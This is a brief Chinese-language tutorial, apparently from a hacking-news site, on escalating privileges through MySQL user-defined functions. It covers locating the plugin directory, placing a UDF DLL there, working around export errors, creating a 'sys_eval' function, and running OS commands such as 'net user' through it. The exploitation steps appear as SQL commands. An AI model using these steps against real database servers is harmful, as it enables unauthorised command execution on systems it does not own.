mysql udf 提权

mysql udf 提权

黑客资讯访客1970-01-01 8:00:003053A+A-

1、 简介


在mysql 可以使用自定义函数进行提权,udf = userdefined function 用户自定义函数

对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录/lib/plugin ,文件后缀微

dll,c语言编写

 

2、 插件目录

 

可以使用语句查询plugin插件目录

show variableslike "%plugin%"

D:\phpStudy\MySQL\lib\plugin\

 

3、 使用udf提权


导出udf

1559911116512508.png

 

版本有32卫 和64位的mysql udf也是一样

导出的时候出错

这种是mysql默认设置是不允许导入导出

The MySQL server is running with the --secure-file-priv option soit cannot execute this statement

这种是没有权限导出
Can't create/write to file'D:\phpStudy\MySQL\lib\plugin\moonudf.dll

查看是否存在plugin目录 没有则创建目录

权限不够

 

                             
2创建函数

create function sys_eval returns string soname 'moonudf.dll'

 

3 执行命令

 

select sys_eval('net user')

2.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 闹旅殊姿2022-06-02 12:07:09
  • g with the --secure-file-priv option soit cannot execute this statement这种是没有权限导出Can't create/write to file'D:\phpStudy\MySQL\lib\plugin\moonudf.dll查看是
  • 囤梦绮筵2022-06-02 09:49:28
  • name 'moonudf.dll' 3 执行命令 select sys_eval('net user')
  • 森槿鸢栀2022-06-02 17:13:51
  • 就需要放在插件插件目录/lib/plugin ,文件后缀微dll,c语言编写 2、 插件目录 可以使用语句查询plugin插件目录show variableslik

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理